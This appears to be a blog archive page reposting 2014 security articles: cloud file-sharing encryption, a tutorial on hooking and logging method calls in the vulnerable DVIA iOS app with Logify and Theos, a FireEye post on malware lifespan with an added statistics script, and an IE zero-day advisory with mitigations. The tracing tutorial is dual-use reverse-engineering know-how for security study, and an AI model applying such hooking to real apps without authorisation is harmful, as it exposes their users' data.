<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
The recent disclosure of the <a href="http://www.bbc.co.uk/news/technology-26969629" style="color: rgb(51, 51, 51) !important; text-decoration: none;"><span style="color: blue; text-decoration: underline;">Heartbleed bug</span></a> and the ease with which hackers have bypassed the security / authentication mechanisms of many websites that were previously perceived as secure raises a more fundamental security concern. <a href="http://www.computerweekly.com/news/2240160676/Unsafe-password-practices-cause-Dropbox-spam-scare" style="color: rgb(51, 51, 51) !important; text-decoration: none;"><span style="color: blue; text-decoration: underline;">As Dropbox found out when they were hacked two years ago</span></a>, the consequences of unpermitted users gaining access to unencrypted data can be disastrous. An attentive reading of the security credential webpages of many file transfer service providers shows that although they may have taken steps to protect data in transit using TLS, very few have taken steps to encrypt information at rest.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<strong>A Secure Approach to File Transfer</strong></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
These factors pose significant threats to data security – however, they shouldn’t be used as excuses to avoid effective file sharing through Cloud-based service providers. Organisations should be able to take advantage of the benefits offered by file transfer sites, such as time and cost efficiencies, without compromising their data security.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Investment must be made in suitably secure platforms. Sensitive data needs to be encrypted both in transit and at rest, and appropriate access control mechanisms need to be implemented so that organisations and central administrators have full visibility and control over who accesses information – including the ability to restrict the access rights of those no longer relevant to the project, such as ex-employees.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
In addition, independent certification can provide further reassurance for users and their IT departments. <a href="http://www.cesg.gov.uk/pages/404cesg.aspx" style="color: rgb(51, 51, 51) !important; text-decoration: none;"><span style="color: blue; text-decoration: underline;">CESG’s Foundation Grade CPA programme</span></a>, for example, certifies commercial security products for use by government, the wider public sector and industry in lower threat environments. Products that are awarded this certification have to meet a detailed set of characteristics and security principles, and as such, demonstrate that the technology and supporting business processes behind them can be fully trusted to protect sensitive information during the data sharing lifecycle.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<strong>Managing File Transfer Services</strong></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Aside from data security concerns, file transfer sites can also present service management and integration issues. For many, these sites are seen as separate from traditional email and online collaboration solutions, which means they are procured, developed and managed differently, with solutions kept in isolation from one another. The result is data silos, system complexity, unnecessary costs, additional ongoing management overhead, and low end-user take up.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
In the absence of a centralised solution, various file transfer sites are often used on an ad-hoc basis, again making it difficult for IT staff and senior management to maintain visibility over what information is being shared where and with whom. Similarly, managing multiple sets of credentials for separate email and file transfer services can create problems for users, who may resort to using insecure websites as a way around this. Not only does this risk a data breach, but it also impacts efficiency – one of the reasons these services are used in the first place.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<strong>An Integrated Approach to File Transfer</strong></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
To simplify this process and increase centralised control over the information that employees are sharing with external third parties, an integrated approach to data management needs to be taken. This involves procuring <a href="http://www.egress.com/solutions-large-file-transfer/" style="color: rgb(51, 51, 51) !important; text-decoration: none;"><span style="color: blue; text-decoration: underline;">file transfer solutions</span></a> as part of a broad information sharing platform that also includes <a href="http://www.egress.com/solutions-secure-email/" style="color: rgb(51, 51, 51) !important; text-decoration: none;"><span style="color: blue; text-decoration: underline;">secure email and collaboration functionality</span></a>. Moreover, it is also important that these services sit well within an organisation’s existing infrastructure to improve workflow and business processes.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<strong>Benefitting from Cloud Services</strong></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
File transfers shouldn’t be an issue that makes senior management and IT departments uncomfortable. Visibility over personal and commercially sensitive information shared with third parties shouldn’t be sacrificed to benefit end-user ease of use, and similarly, workplace efficiency should only be impacted positively by file transfer solutions.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
The benefits of Cloud services, data protection, and an integrated approach to secure communication shouldn’t be mutually exclusive.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<a href="http://resources.infosecinstitute.com/cloud-based-file-sharing-websites-data-security-disaster-waiting-happen/" target="_blank">http://resources.infosecinstitute.com/cloud-based-file-sharing-websites-data-security-disaster-waiting-happen/</a></div>
Anonymoushttp://www.blogger.com/profile/11284358086402489118noreply@blogger.com0tag:blogger.com,1999:blog-4996980881256752769.post-83938722491569234862014-05-05T18:19:00.001-07:002014-05-05T18:19:06.847-07:00[infosecinstitute] iOS Application Security Part 34 – Tracing Method calls using Logify<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
In the <a href="http://highaltitudehacks.com/security" style="color: rgb(51, 51, 51) !important; text-decoration: none;"><span style="text-decoration: underline;">previous</span></a> <a href="http://resources.infosecinstitute.com/articles/" style="color: rgb(51, 51, 51) !important; text-decoration: none;" title="articles">articles</a>, we have seen how applications like Snoop-it can trace method calls specific to the application at runtime. This is very important in deducing the flow of the application. The same process can be performed using a Perl script named Logify.pl that comes installed with Theos. The script takes a header file as input and generates the hooking code that we can add to our tweak. We can also specify the classes we want to check. Once the tweak is installed on the device, whenever a method of one of those classes is called, the tweak logs the method along with its arguments to syslog. The first step here is to get the header files for a particular application. You can get the header files by using the -H option in class-dump-z. Once the headers folder is generated, you can copy it to your system.</div>
<a name='more'></a><br />
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/043014_1340_iOSApplicat1.png" src="http://resources.infosecinstitute.com/wp-content/uploads/043014_1340_iOSApplicat1.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Now we can use the Logify.pl script on these header files to generate our tweak. In this case, we are testing on <a href="http://damnvulnerableiosapp.com/" style="color: rgb(51, 51, 51) !important; text-decoration: none;"><span style="text-decoration: underline;">Damn Vulnerable iOS application</span></a>. Let’s add all the classes for which we want to log the method calls. In our case, we select three classes for which we want to trace the method calls, ClientSideInjectionVC, JailbreakDetectionVC and DamnVulnerableAppUtilities.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/043014_1340_iOSApplicat2.png" src="http://resources.infosecinstitute.com/wp-content/uploads/043014_1340_iOSApplicat2.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
This is what our Tweak.xm file looks like.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/043014_1340_iOSApplicat3.png" src="http://resources.infosecinstitute.com/wp-content/uploads/043014_1340_iOSApplicat3.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Now let’s create a tweak and replace its Tweak.xm file with our own. Also, give the filter as the bundle identifier for DVIA, as we only want to trace calls for DVIA. Have a look at the <a href="http://highaltitudehacks.com/2014/04/18/ios-application-security-part-33-writing-tweaks-using-theos-cydia-substrate" style="color: rgb(51, 51, 51) !important; text-decoration: none;"><span style="text-decoration: underline;">previous</span></a> article if you are new to writing tweaks.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/043014_1340_iOSApplicat4.png" src="http://resources.infosecinstitute.com/wp-content/uploads/043014_1340_iOSApplicat4.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Build the package.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/043014_1340_iOSApplicat5.png" src="http://resources.infosecinstitute.com/wp-content/uploads/043014_1340_iOSApplicat5.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Now install it on your device and respring your device.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/043014_1340_iOSApplicat6.png" src="http://resources.infosecinstitute.com/wp-content/uploads/043014_1340_iOSApplicat6.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Now check the folder <em>/Library/MobileSubstrate/DynamicLibraries</em> on your device to see whether the tweak was installed, and sure enough, we can see that it has been installed.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/043014_1340_iOSApplicat7.png" src="http://resources.infosecinstitute.com/wp-content/uploads/043014_1340_iOSApplicat7.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Now run the DVIA app. Make sure your device is connected to your computer and go to Xcode —> Window —> Organizer —> Devices & select your device and click on Console. You will see the DVIAMethodTracer tweak being loaded into your application.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/043014_1340_iOSApplicat8.png" src="http://resources.infosecinstitute.com/wp-content/uploads/043014_1340_iOSApplicat8.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
And now as you browse around in the application and invoke methods for the particular classes that we have set up Logify for, you will see that these methods are logged along with the value of their arguments.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/043014_1340_iOSApplicat9.png" src="http://resources.infosecinstitute.com/wp-content/uploads/043014_1340_iOSApplicat9.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Logify can be a very useful tool in figuring out the order in which methods are called and hence deducing a lot about the flow of the application.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<a href="http://resources.infosecinstitute.com/ios-application-security-part-34-tracing-method-calls-using-logify/" target="_blank">http://resources.infosecinstitute.com/ios-application-security-part-34-tracing-method-calls-using-logify/</a></div>
Anonymoushttp://www.blogger.com/profile/11284358086402489118noreply@blogger.com0tag:blogger.com,1999:blog-4996980881256752769.post-46653924805895318882014-05-05T18:14:00.002-07:002014-05-05T18:14:17.663-07:00[fireeye] Ghost-Hunting With Anti-Virus<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
In October 2012, data security firm Imperva released a controversial report on the efficacy of anti-virus (AV), which concluded that AV solutions only stopped 5 percent of all malware identified. Few reports in the security industry had been as polarizing as this one—many reacting with white-knuckle rage. It was a classic case of Chris Christensen’s “Innovator’s Dilemma,” where old school technologies cling to life, in the face of a new paradigm. Just yesterday, one of the original anti-virus vendors joined the fray in “<a href="http://online.wsj.com/news/articles/SB10001424052702303417104579542140235850578" style="color: #4298b5; font-weight: bold; text-decoration: none;" target="_blank">declaring anti-virus dead</a>” in the Wall Street Journal.</div>
<a name='more'></a><br />
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
At FireEye, we look at hundreds of malware samples daily, and, in a recent talk at RSA Conference, Zheng Bu, vice president of research at FireEye presented some interesting data that security teams should consider as they think about their AV initiatives. Looking at nearly half a million malware samples over two years, our researchers discovered that the average lifespan of a piece of malware is very short. The chart below compares how many hours (X axis) malware lives against the total pool of malware samples (Y axis) to show just how quickly they disappear:</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px; text-align: center;">
<a href="http://www.fireeye.com/blog/wp-content/uploads/2014/05/av1.png" style="color: #4298b5; font-weight: bold; text-decoration: none;"><img alt="av1" height="296" src="http://www.fireeye.com/blog/wp-content/uploads/2014/05/av1.png" style="border: 0px; max-width: 98%;" width="540" /></a></div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
Our data shows an interesting picture: most malware remains active for no more than two hours when FireEye is detecting it. To be precise, our analysis showed that in 2013:</div>
<ul style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 16.003000259399414px; margin: 0px; padding: 0px;">
<li style="background-image: url(http://www.fireeye.com/images/common/bullet.png); background-position: 28px 6px; background-repeat: no-repeat no-repeat; line-height: 1.4em; list-style: none; margin: 0px; padding: 0px 0px 13px 44px;">82 percent of malware disappears after one hour</li>
<li style="background-image: url(http://www.fireeye.com/images/common/bullet.png); background-position: 28px 6px; background-repeat: no-repeat no-repeat; line-height: 1.4em; list-style: none; margin: 0px; padding: 0px 0px 13px 44px;">70 percent of malware only exists once</li>
</ul>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
With the half-life of malware being so short, we can conclude that the function signature-based AV serves has become more akin to ghost hunting than to threat detection and prevention. In spite of this, IDC found the market for endpoint security products like anti-virus to generate $11 billion in revenues in its <a href="http://idcdocserv.com/242465e_Qualys" style="color: #4298b5; font-weight: bold; text-decoration: none;" target="_blank">“Worldwide IT Security Products 2013 – 2017 Forecast”</a>, despite APT activities creating nearly fifty unique malware infections every day.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
<b><span style="text-decoration: underline;">In AV Land, Everyone Is a Sacrificial Lamb</span></b></div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
Today’s AV model makes everyone a sacrificial lamb. In the past, malware writers would write their attack code once with little need to iterate. Today, as our numbers show, rapidly developing iterations of malware is becoming the de facto way of hacking.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
A simple comparison of the malware writing process versus anti-virus signature development shows a stark contrast.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
First, let’s look at the malware development process:</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px; text-align: center;">
<a href="http://www.fireeye.com/blog/wp-content/uploads/2014/05/av2.png" style="color: #4298b5; font-weight: bold; text-decoration: none;"><img alt="av2" class="aligncenter wp-image-5423" height="198" src="http://www.fireeye.com/blog/wp-content/uploads/2014/05/av2.png" style="border: 0px; max-width: 98%;" width="540" /></a></div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
Malware is developed, QA’d against the latest AV signatures, released, and once it is picked up by AV sensors and shared among vendors—the malware dies. The process takes a few days at most.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
By contrast, anti-virus vendors work in a process that takes a few days to a few weeks.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px; text-align: center;">
<a href="http://www.fireeye.com/blog/wp-content/uploads/2014/05/av3.png" style="color: #4298b5; font-weight: bold; text-decoration: none;"><img alt="av3" class="aligncenter wp-image-5422" height="198" src="http://www.fireeye.com/blog/wp-content/uploads/2014/05/av3.png" style="border: 0px; max-width: 98%;" width="540" /></a></div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
Examining the two “supply chains,” you quickly see why anti-virus is inherently behind the curve – doomed to chasing ghosts. By the time malware signatures are updated from collection and have gone through QA, the samples are more or less defunct, except in the rare instance where the core code of the malware could not be modified. Over the years AV vendors have increased the frequency of signature updates to convey the benefits of eventual detection. However, it is already an increasing challenge to apply frequent security updates to thousands of business-critical computer assets in medium to large size organizations – especially where many assets, such as laptops, are also mobile. Ultimately this does not close the gap of days to weeks that collecting new malware samples can take, which is why security solutions – like FireEye – that do not rely on such a reactive model detect malware faster.</div>
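<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
The following Python script is an added example and is not FireEye's code or data. It shows how the two statistics quoted earlier in this post (the share of samples seen only once and the share gone within an hour) are computed from sighting telemetry, and then models the two “supply chains” compared above by asking how many samples would still have been live when a signature with a given latency shipped. The sample labels and timestamps are constructed placeholders; in a real pipeline the label would be a file hash and the sightings would come from sensor logs.</div>

```python
"""Malware-lifespan statistics versus signature latency.

Added example, not FireEye's code or data: the sighting records below are
constructed placeholders. It reproduces the two kinds of statistic the post
quotes (share of samples seen only once, share gone within an hour) and then
asks how many samples would still have been live when a signature with a
given latency shipped, which is the 'supply chain' race the post describes.
"""
from collections import defaultdict
from datetime import datetime

# Constructed telemetry: (sample label, ISO-8601 sighting time). In a real
# pipeline the label would be a file hash; these names are placeholders.
SIGHTINGS = [
    ("sample-A", "2013-03-01T10:00:00"),
    ("sample-A", "2013-03-01T10:40:00"),  # lives 40 minutes
    ("sample-B", "2013-03-01T11:00:00"),  # seen once
    ("sample-C", "2013-03-02T09:00:00"),
    ("sample-C", "2013-03-02T09:30:00"),
    ("sample-C", "2013-03-02T12:30:00"),  # lives 3.5 hours
    ("sample-D", "2013-03-03T08:00:00"),  # seen once
    ("sample-E", "2013-03-03T08:05:00"),
    ("sample-E", "2013-03-20T08:05:00"),  # long-lived: 17 days (408 h)
    ("sample-F", "2013-03-04T00:00:00"),  # seen once
    ("sample-G", "2013-03-04T01:00:00"),
    ("sample-G", "2013-03-04T01:59:00"),  # lives 59 minutes
    ("sample-H", "2013-03-05T13:00:00"),  # seen once
    ("sample-I", "2013-03-05T14:00:00"),  # seen once
    ("sample-J", "2013-03-06T14:00:00"),  # seen once
]


def parse(sightings):
    """Collapse raw sightings into {label: (first_seen, last_seen, count)}."""
    first, last, count = {}, {}, defaultdict(int)
    for label, ts in sightings:
        t = datetime.fromisoformat(ts)
        first[label] = min(first.get(label, t), t)
        last[label] = max(last.get(label, t), t)
        count[label] += 1
    return {k: (first[k], last[k], count[k]) for k in first}


def lifespan_hours(stats):
    """Hours between first and last sighting of each sample (0 if seen once)."""
    return {k: (last - first).total_seconds() / 3600
            for k, (first, last, _) in stats.items()}


def share_seen_once(stats):
    """Fraction of samples with exactly one sighting (the post's '70 percent')."""
    return sum(1 for _, _, c in stats.values() if c == 1) / len(stats)


def share_gone_within(stats, hours):
    """Fraction of samples whose last sighting is within `hours` of the first."""
    spans = lifespan_hours(stats)
    return sum(1 for h in spans.values() if h <= hours) / len(spans)


def share_caught_by_signature(stats, latency_hours):
    """Fraction of samples still live when a signature would have shipped.

    Model: a signature for a sample becomes available `latency_hours` after
    its first sighting anywhere. The sample counts as caught only if it was
    still being seen at or after that moment; otherwise the signature arrives
    for a sample that is already defunct (the post's 'ghost').
    """
    caught = 0
    for first, last, _ in stats.values():
        if (last - first).total_seconds() / 3600 >= latency_hours:
            caught += 1
    return caught / len(stats)


def main():
    stats = parse(SIGHTINGS)
    print(f"samples: {len(stats)}")
    print(f"seen only once:        {share_seen_once(stats):.0%}")
    print(f"gone within one hour:  {share_gone_within(stats, 1):.0%}")
    # Latencies in hours: same hour, one day, one week (the post's days to weeks).
    for latency in (1, 24, 24 * 7):
        print(f"caught by a {latency:>3}h-latency signature: "
              f"{share_caught_by_signature(stats, latency):.0%}")


if __name__ == "__main__":
    main()
```

Two caveats when reading the output. A sample is identified by its exact label (a hash in practice), so a repacked variant of the same family counts as a new sample; that is exactly why a fast-iterating family shows up as many samples that “exist once”, and a generic or behavioural signature that covers the whole family would catch more than this per-hash model credits. Lifespan is also measured only between sightings on the collecting sensors, so it is a lower bound on how long the sample was really in circulation.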
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
To be clear, single-iteration malware will persist, and a minor need for AV will remain to provide a layer of reactive protection against these unsophisticated, benign threats. But with high-profile breaches occurring frequently, driven by fast-moving, advanced threats, it is clear that next-generation technologies and approaches are needed. Even Gartner has noted the senescence of anti-virus in two very recent reports. Notably, the Magic Quadrant for Endpoint Protection Platforms (i.e., anti-virus) opens its “Market Overview” with these sentences:</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
<i>The rise of the targeted attack is shredding what is left of the [endpoint] anti-malware market’s stubborn commitment to reactive protection techniques. Improving the malware signature distribution system, or adapting behavior detection [in endpoint solutions] to account for the latest attack styles, will not improve the effectiveness rates against targeted attacks. (From 8 January 2014).</i></div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
So, what should we do as an industry, knowing that AV is ineffective today based on these findings? We recommend:</div>
<ul style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 16.003000259399414px; margin: 0px; padding: 0px;">
<li style="background-image: url(http://www.fireeye.com/images/common/bullet.png); background-position: 28px 6px; background-repeat: no-repeat no-repeat; line-height: 1.4em; list-style: none; margin: 0px; padding: 0px 0px 13px 44px;">Accepting that the signature-based AV model cannot play a key part in enterprises’ threat-prevention models. Start shifting security strategies to modern methods that identify malware at the time of attack rather than after it has died.</li>
<li style="background-image: url(http://www.fireeye.com/images/common/bullet.png); background-position: 28px 6px; background-repeat: no-repeat no-repeat; line-height: 1.4em; list-style: none; margin: 0px; padding: 0px 0px 13px 44px;">Reconfigure compliance mandates to place much less emphasis on AV and other reactive, signature-based approaches. Once regulators and compliance mandates make it easier to adopt innovation, we’ll finally make life a little harder for the attackers.</li>
</ul>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
In doing this, we will be able to protect ourselves not from the ghosts that we imagine are haunting our homes, but from the burglars and malware that truly steal our possessions and erode our foundations.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
<a href="http://www.fireeye.com/blog/corporate/2014/05/ghost-hunting-with-anti-virus.html" target="_blank">http://www.fireeye.com/blog/corporate/2014/05/ghost-hunting-with-anti-virus.html</a></div>
Anonymoushttp://www.blogger.com/profile/11284358086402489118noreply@blogger.com0tag:blogger.com,1999:blog-4996980881256752769.post-5083232718920427092014-05-05T18:06:00.003-07:002014-05-05T18:06:48.908-07:00[fireeye] Mobile Phones: Smart Doesn’t Equal Safe<a href="http://www2.fireeye.com/bring-your-own-difficulties.html" style="background-color: white; color: #4298b5; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; font-weight: bold; line-height: 18.200000762939453px; text-align: center; text-decoration: none;" target="_blank"><img alt="Mobile Phones: Smart Doesn't Equal Safe" class="aligncenter wp-image-5411" height="1600" src="http://www.fireeye.com/blog/wp-content/uploads/2014/05/mobile_infographic.png" style="border: 0px; max-width: 98%;" width="600" /></a><br />
<a href="http://www.fireeye.com/blog/corporate/2014/05/mobile-phones-smart-doesnt-equal-safe.html" target="_blank">http://www.fireeye.com/blog/corporate/2014/05/mobile-phones-smart-doesnt-equal-safe.html</a>Anonymoushttp://www.blogger.com/profile/11284358086402489118noreply@blogger.com0tag:blogger.com,1999:blog-4996980881256752769.post-72096743802639167392014-05-05T18:05:00.002-07:002014-05-05T18:05:42.037-07:00[fireeye] “Operation Clandestine Fox” Now Attacking Windows XP Using Recently Discovered IE Vulnerability<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
On April 26th, FireEye Research Labs notified the public of a <a href="http://www.fireeye.com/blog/uncategorized/2014/04/new-zero-day-exploit-targeting-internet-explorer-versions-9-through-11-identified-in-targeted-attacks.html" style="color: #4298b5; font-weight: bold; text-decoration: none;">new IE zero-day exploit being used in “Operation Clandestine Fox.”</a> The initial attack targeted users of IE versions 9, 10, and 11 on Windows 7 and 8. Despite attackers only targeting those versions of Microsoft IE and Windows OS, <b>the vulnerability actually impacts all versions of IE from 6 through 11.</b></div>
<a name='more'></a><br />
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
Today, FireEye Labs can reveal a newly uncovered version of the attack that specifically targets out-of-life <b>Windows XP machines running IE 8</b>. <b>This means that live attacks exploiting </b><a href="https://technet.microsoft.com/en-US/library/security/2963983" style="color: #4298b5; font-weight: bold; text-decoration: none;" target="_blank">CVE-2014-1776</a><b> are now occurring against users of IE 8 through 11 and Windows XP, 7 and 8</b>.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
We have also observed that multiple new threat actors are now using the exploit in attacks and have expanded the industries they are targeting. In addition to previously observed attacks against the Defense and Financial sectors, organizations in the Government and Energy sectors are now also facing attack.</div>
<h2 style="background-color: white; color: #c8102e; font-family: arial, helvetica, clean, sans-serif; font-size: 18px; font-weight: normal; margin: 0px 0px 10px; padding: 0px 0px 4px;">
Mitigation</h2>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
In our tests, disabling VGX.dll blocks this attack on all configurations of IE and Windows OSs. However, we strongly suggest that Windows XP users upgrade to a later Windows operating system to take advantage of new mitigation technologies from Microsoft, such as EMET 5.0 and IE with Enhanced Protected Mode (EPM). Deploying preventative measures now will help mitigate the impact of these exploits until Microsoft patches the underlying vulnerability, and will offer additional protection from future zero-day exploits.</div>
